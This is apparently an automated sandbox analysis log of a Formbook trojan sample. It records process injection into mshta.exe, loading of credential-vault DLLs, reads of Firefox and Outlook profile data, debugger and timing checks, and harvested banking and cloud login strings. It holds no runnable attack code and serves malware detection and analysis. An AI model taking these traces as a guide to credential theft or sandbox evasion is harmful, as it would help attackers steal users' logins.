          Source: C:\Windows\SysWOW64\mshta.exe Code function: 3_2_02F59510 NtClose,3_2_02F59510
          Source: wavjjT3sEq.exe Static PE information: No import functions for PE file found
          Source: wavjjT3sEq.exe, 00000000.00000003.1503410876.00000000016AB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs wavjjT3sEq.exe
          Source: wavjjT3sEq.exe, 00000000.00000003.1505562906.0000000001868000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs wavjjT3sEq.exe
          Source: wavjjT3sEq.exe, 00000000.00000003.1605358427.000000000149D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameMSHTA.EXED vs wavjjT3sEq.exe
          Source: wavjjT3sEq.exe, 00000000.00000003.1605358427.00000000014A4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameMSHTA.EXED vs wavjjT3sEq.exe
          Source: wavjjT3sEq.exe, 00000000.00000002.1605784571.0000000001A1D000.00000040.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs wavjjT3sEq.exe
          Source: wavjjT3sEq.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: 0.2.wavjjT3sEq.exe.120000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000003.00000002.3899264398.0000000002F30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000003.00000002.3911530315.0000000003600000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000003.00000002.3908871484.0000000003560000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000000.00000002.1605416839.0000000000121000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000000.00000002.1605691248.00000000017D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000005.00000002.3917330030.0000000005290000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000002.00000002.3911848031.0000000002BD0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000000.00000002.1606273875.0000000001C40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: wavjjT3sEq.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: wavjjT3sEq.exeStatic PE information: Section .text
          Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@5/1@16/10
          Source: C:\Windows\SysWOW64\mshta.exeFile created: C:\Users\user\AppData\Local\Temp\1863I7301
          Source: C:\Program Files\Mozilla Firefox\firefox.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: mshta.exe, 00000003.00000002.3902512217.00000000030C5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.3902512217.00000000030C2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.3902512217.00000000030AB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
          Source: wavjjT3sEq.exeReversingLabs: Detection: 71%
          Source: unknownProcess created: C:\Users\user\Desktop\wavjjT3sEq.exe "C:\Users\user\Desktop\wavjjT3sEq.exe"
          Source: C:\Program Files (x86)\pXSNBUHDsqQVToaFHPUXcMuovyvTQqdzPJVsbrLNEr\tIEQBQsFNUYr.exeProcess created: C:\Windows\SysWOW64\mshta.exe "C:\Windows\SysWOW64\mshta.exe"
          Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeSection loaded: apphelp.dll
          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: iertutil.dll
          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wininet.dll
          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: kernel.appcore.dll
          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: uxtheme.dll
          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: ieframe.dll
          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: netapi32.dll
          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: version.dll
          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: userenv.dll
          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: winhttp.dll
          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wkscli.dll
          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: netutils.dll
          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sspicli.dll
          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: windows.storage.dll
          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wldp.dll
          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: profapi.dll
          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: secur32.dll
          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mlang.dll
          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: propsys.dll
          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: winsqlite3.dll
          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: vaultcli.dll
          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dll
          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dpapi.dll
          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: cryptbase.dll
          Source: C:\Program Files (x86)\pXSNBUHDsqQVToaFHPUXcMuovyvTQqdzPJVsbrLNEr\tIEQBQsFNUYr.exeSection loaded: wininet.dll
          Source: C:\Program Files (x86)\pXSNBUHDsqQVToaFHPUXcMuovyvTQqdzPJVsbrLNEr\tIEQBQsFNUYr.exeSection loaded: mswsock.dll
          Source: C:\Program Files (x86)\pXSNBUHDsqQVToaFHPUXcMuovyvTQqdzPJVsbrLNEr\tIEQBQsFNUYr.exeSection loaded: dnsapi.dll
          Source: C:\Program Files (x86)\pXSNBUHDsqQVToaFHPUXcMuovyvTQqdzPJVsbrLNEr\tIEQBQsFNUYr.exeSection loaded: iphlpapi.dll
          Source: C:\Program Files (x86)\pXSNBUHDsqQVToaFHPUXcMuovyvTQqdzPJVsbrLNEr\tIEQBQsFNUYr.exeSection loaded: fwpuclnt.dll
          Source: C:\Program Files (x86)\pXSNBUHDsqQVToaFHPUXcMuovyvTQqdzPJVsbrLNEr\tIEQBQsFNUYr.exeSection loaded: rasadhlp.dll
          Source: C:\Windows\SysWOW64\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32
          Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
          Source: wavjjT3sEq.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
          Source: Binary string: mshta.pdbGCTL source: wavjjT3sEq.exe, 00000000.00000003.1605358427.000000000149D000.00000004.00000020.00020000.00000000.sdmp, tIEQBQsFNUYr.exe, 00000002.00000002.3908394501.000000000119E000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: tIEQBQsFNUYr.exe, 00000002.00000000.1520159882.000000000100E000.00000002.00000001.01000000.00000004.sdmp, tIEQBQsFNUYr.exe, 00000005.00000002.3911627042.000000000100E000.00000002.00000001.01000000.00000004.sdmp
          Source: Binary string: wntdll.pdbUGP source: wavjjT3sEq.exe, 00000000.00000002.1605784571.0000000001A8E000.00000040.00001000.00020000.00000000.sdmp, wavjjT3sEq.exe, 00000000.00000003.1505562906.000000000173B000.00000004.00000020.00020000.00000000.sdmp, wavjjT3sEq.exe, 00000000.00000003.1503410876.0000000001588000.00000004.00000020.00020000.00000000.sdmp, wavjjT3sEq.exe, 00000000.00000002.1605784571.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.3911877579.00000000037B0000.00000040.00001000.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.3911877579.000000000394E000.00000040.00001000.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1608127270.000000000360A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1605751778.0000000003439000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: wavjjT3sEq.exe, wavjjT3sEq.exe, 00000000.00000002.1605784571.0000000001A8E000.00000040.00001000.00020000.00000000.sdmp, wavjjT3sEq.exe, 00000000.00000003.1505562906.000000000173B000.00000004.00000020.00020000.00000000.sdmp, wavjjT3sEq.exe, 00000000.00000003.1503410876.0000000001588000.00000004.00000020.00020000.00000000.sdmp, wavjjT3sEq.exe, 00000000.00000002.1605784571.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, mshta.exe, mshta.exe, 00000003.00000002.3911877579.00000000037B0000.00000040.00001000.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.3911877579.000000000394E000.00000040.00001000.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1608127270.000000000360A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1605751778.0000000003439000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: mshta.pdb source: wavjjT3sEq.exe, 00000000.00000003.1605358427.000000000149D000.00000004.00000020.00020000.00000000.sdmp, tIEQBQsFNUYr.exe, 00000002.00000002.3908394501.000000000119E000.00000004.00000020.00020000.00000000.sdmp
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_00125130 push 276952D9h; iretd 0_2_00125135
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_0013E990 push edx; ret 0_2_0013E991
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_00124A47 push edi; retf 0_2_00124A48
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_0013AA8F push ebx; ret 0_2_0013AB40
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_0013F303 push edi; iretd 0_2_0013F30F
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_00131B28 pushad ; ret 0_2_00131B29
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_001233A0 push eax; ret 0_2_001233A2
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_00135C53 push 4D40979Fh; retf AA07h0_2_00135DF1
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_00146DE3 push edi; ret 0_2_00146DEE
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_00124E7A push ebp; ret 0_2_00124E7B
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_00128686 pushad ; retf 0_2_00128687
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_00124EC0 push A00DC95Eh; retf 0_2_00124EF3
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019209AD push ecx; mov dword ptr [esp], ecx0_2_019209B6
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 3_2_037B225F pushad ; ret 3_2_037B27F9
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 3_2_037B27FA pushad ; ret 3_2_037B27F9
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 3_2_037E09AD push ecx; mov dword ptr [esp], ecx3_2_037E09B6
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 3_2_037B283D push eax; iretd 3_2_037B2858
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 3_2_02F3E785 pushad ; ret 3_2_02F3E786
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 3_2_02F428B0 push 4D40979Fh; retf AA07h3_2_02F42A4E
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 3_2_02F50F74 pushfd ; ret 3_2_02F50F75
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 3_2_02F352E3 pushad ; retf 3_2_02F352E4
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 3_2_02F476EC push ebx; ret 3_2_02F4779D
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 3_2_02F316A4 push edi; retf 3_2_02F316A5
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 3_2_02F4B5ED push edx; ret 3_2_02F4B5EE
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 3_2_02F31AD7 push ebp; ret 3_2_02F31AD8
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 3_2_02F53A40 push edi; ret 3_2_02F53A4B
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 3_2_02F4BA18 push eax; iretd 3_2_02F4BA2F
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 3_2_02F31B1D push A00DC95Eh; retf 3_2_02F31B50
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 3_2_02F4DB03 push ds; ret 3_2_02F4DB0C
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 3_2_02F4BF60 push edi; iretd 3_2_02F4BF6C
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 3_2_02F4BF52 push edi; iretd 3_2_02F4BF6C
          Source: wavjjT3sEq.exeStatic PE information: section name: .text entropy: 7.995583264592467
          Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion

          Source: C:\Windows\SysWOW64\mshta.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD324
          Source: C:\Windows\SysWOW64\mshta.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD7E4
          Source: C:\Windows\SysWOW64\mshta.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD944
          Source: C:\Windows\SysWOW64\mshta.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD504
          Source: C:\Windows\SysWOW64\mshta.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD544
          Source: C:\Windows\SysWOW64\mshta.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD1E4
          Source: C:\Windows\SysWOW64\mshta.exeAPI/Special instruction interceptor: Address: 7FFBCB7B0154
          Source: C:\Windows\SysWOW64\mshta.exeAPI/Special instruction interceptor: Address: 7FFBCB7ADA44
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_0013AA8F rdtsc 0_2_0013AA8F
          Source: C:\Windows\SysWOW64\mshta.exeWindow / User API: threadDelayed 7371
          Source: C:\Windows\SysWOW64\mshta.exeWindow / User API: threadDelayed 2600
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeAPI coverage: 0.7 %
          Source: C:\Windows\SysWOW64\mshta.exeAPI coverage: 2.6 %
          Source: C:\Windows\SysWOW64\mshta.exe TID: 2752Thread sleep count: 7371 > 30
          Source: C:\Windows\SysWOW64\mshta.exe TID: 2752Thread sleep time: -14742000s >= -30000s
          Source: C:\Windows\SysWOW64\mshta.exe TID: 2752Thread sleep count: 2600 > 30
          Source: C:\Windows\SysWOW64\mshta.exe TID: 2752Thread sleep time: -5200000s >= -30000s
          Source: C:\Program Files (x86)\pXSNBUHDsqQVToaFHPUXcMuovyvTQqdzPJVsbrLNEr\tIEQBQsFNUYr.exe TID: 5040Thread sleep time: -85000s >= -30000s
          Source: C:\Program Files (x86)\pXSNBUHDsqQVToaFHPUXcMuovyvTQqdzPJVsbrLNEr\tIEQBQsFNUYr.exe TID: 5040Thread sleep count: 37 > 30
          Source: C:\Program Files (x86)\pXSNBUHDsqQVToaFHPUXcMuovyvTQqdzPJVsbrLNEr\tIEQBQsFNUYr.exe TID: 5040Thread sleep time: -55500s >= -30000s
          Source: C:\Program Files (x86)\pXSNBUHDsqQVToaFHPUXcMuovyvTQqdzPJVsbrLNEr\tIEQBQsFNUYr.exe TID: 5040Thread sleep count: 42 > 30
          Source: C:\Program Files (x86)\pXSNBUHDsqQVToaFHPUXcMuovyvTQqdzPJVsbrLNEr\tIEQBQsFNUYr.exe TID: 5040Thread sleep time: -42000s >= -30000s
          Source: C:\Windows\SysWOW64\mshta.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 3_2_02F4C6D0 FindFirstFileW,FindNextFileW,FindClose,3_2_02F4C6D0
          Source: 1863I7301.3.drBinary or memory string: ms.portal.azure.comVMware20,11696494690
          Source: 1863I7301.3.drBinary or memory string: discord.comVMware20,11696494690f
          Source: 1863I7301.3.drBinary or memory string: AMC password management pageVMware20,11696494690
          Source: 1863I7301.3.drBinary or memory string: outlook.office.comVMware20,11696494690s
          Source: 1863I7301.3.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
          Source: 1863I7301.3.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
          Source: 1863I7301.3.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
          Source: 1863I7301.3.drBinary or memory string: interactivebrokers.comVMware20,11696494690
          Source: 1863I7301.3.drBinary or memory string: netportal.hdfcbank.comVMware20,11696494690
          Source: 1863I7301.3.drBinary or memory string: interactivebrokers.co.inVMware20,11696494690d
          Source: 1863I7301.3.drBinary or memory string: account.microsoft.com/profileVMware20,11696494690u
          Source: 1863I7301.3.drBinary or memory string: outlook.office365.comVMware20,11696494690t
          Source: 1863I7301.3.drBinary or memory string: www.interactivebrokers.comVMware20,11696494690}
          Source: 1863I7301.3.drBinary or memory string: microsoft.visualstudio.comVMware20,11696494690x
          Source: 1863I7301.3.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
          Source: 1863I7301.3.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696494690
          Source: mshta.exe, 00000003.00000002.3902512217.0000000002FF3000.00000004.00000020.00020000.00000000.sdmp, tIEQBQsFNUYr.exe, 00000005.00000002.3908738865.0000000000EE0000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000007.00000002.1913962747.00000266053EC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
          Source: 1863I7301.3.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
          Source: 1863I7301.3.drBinary or memory string: trackpan.utiitsl.comVMware20,11696494690h
          Source: 1863I7301.3.drBinary or memory string: tasks.office.comVMware20,11696494690o
          Source: 1863I7301.3.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
          Source: 1863I7301.3.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
          Source: 1863I7301.3.drBinary or memory string: dev.azure.comVMware20,11696494690j
          Source: 1863I7301.3.drBinary or memory string: global block list test formVMware20,11696494690
          Source: 1863I7301.3.drBinary or memory string: turbotax.intuit.comVMware20,11696494690t
          Source: 1863I7301.3.drBinary or memory string: bankofamerica.comVMware20,11696494690x
          Source: 1863I7301.3.drBinary or memory string: Canara Transaction PasswordVMware20,11696494690}
          Source: 1863I7301.3.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690
          Source: 1863I7301.3.drBinary or memory string: Interactive Brokers - HKVMware20,11696494690]
          Source: 1863I7301.3.drBinary or memory string: Canara Transaction PasswordVMware20,11696494690x
          Source: 1863I7301.3.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
          Source: 1863I7301.3.drBinary or memory string: secure.bankofamerica.comVMware20,11696494690|UE
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeProcess information queried: ProcessInformation
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\mshta.exeProcess queried: DebugPort
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_00137983 LdrLoadDll,0_2_00137983
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_01940310 mov ecx, dword ptr fs:[00000030h]0_2_01940310
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_0195A30B mov eax, dword ptr fs:[00000030h]0_2_0195A30B
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_0195A30B mov eax, dword ptr fs:[00000030h]0_2_0195A30B
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_0195A30B mov eax, dword ptr fs:[00000030h]0_2_0195A30B
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019A035C mov eax, dword ptr fs:[00000030h]0_2_019A035C
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019A035C mov eax, dword ptr fs:[00000030h]0_2_019A035C
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019A035C mov eax, dword ptr fs:[00000030h]0_2_019A035C
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019A035C mov ecx, dword ptr fs:[00000030h]0_2_019A035C
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019A035C mov eax, dword ptr fs:[00000030h]0_2_019A035C
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019A035C mov eax, dword ptr fs:[00000030h]0_2_019A035C
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019EA352 mov eax, dword ptr fs:[00000030h]0_2_019EA352
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019C8350 mov ecx, dword ptr fs:[00000030h]0_2_019C8350
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019A2349 mov eax, dword ptr fs:[00000030h]0_2_019A2349
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019A2349 mov eax, dword ptr fs:[00000030h]0_2_019A2349
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019A2349 mov eax, dword ptr fs:[00000030h]0_2_019A2349
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019A2349 mov eax, dword ptr fs:[00000030h]0_2_019A2349
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019A2349 mov eax, dword ptr fs:[00000030h]0_2_019A2349
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019A2349 mov eax, dword ptr fs:[00000030h]0_2_019A2349
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019A2349 mov eax, dword ptr fs:[00000030h]0_2_019A2349
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019A2349 mov eax, dword ptr fs:[00000030h]0_2_019A2349
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019A2349 mov eax, dword ptr fs:[00000030h]0_2_019A2349
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019A2349 mov eax, dword ptr fs:[00000030h]0_2_019A2349
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019A2349 mov eax, dword ptr fs:[00000030h]0_2_019A2349
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019A2349 mov eax, dword ptr fs:[00000030h]0_2_019A2349
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019A2349 mov eax, dword ptr fs:[00000030h]0_2_019A2349
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019A2349 mov eax, dword ptr fs:[00000030h]0_2_019A2349
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019A2349 mov eax, dword ptr fs:[00000030h]0_2_019A2349
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019C437C mov eax, dword ptr fs:[00000030h]0_2_019C437C
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_0195E284 mov eax, dword ptr fs:[00000030h]0_2_0195E284
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_0195E284 mov eax, dword ptr fs:[00000030h]0_2_0195E284
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019A0283 mov eax, dword ptr fs:[00000030h]0_2_019A0283
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019A0283 mov eax, dword ptr fs:[00000030h]0_2_019A0283
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019A0283 mov eax, dword ptr fs:[00000030h]0_2_019A0283
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019302A0 mov eax, dword ptr fs:[00000030h]0_2_019302A0
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019302A0 mov eax, dword ptr fs:[00000030h]0_2_019302A0
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019B62A0 mov eax, dword ptr fs:[00000030h]0_2_019B62A0
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019B62A0 mov ecx, dword ptr fs:[00000030h]0_2_019B62A0
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019B62A0 mov eax, dword ptr fs:[00000030h]0_2_019B62A0
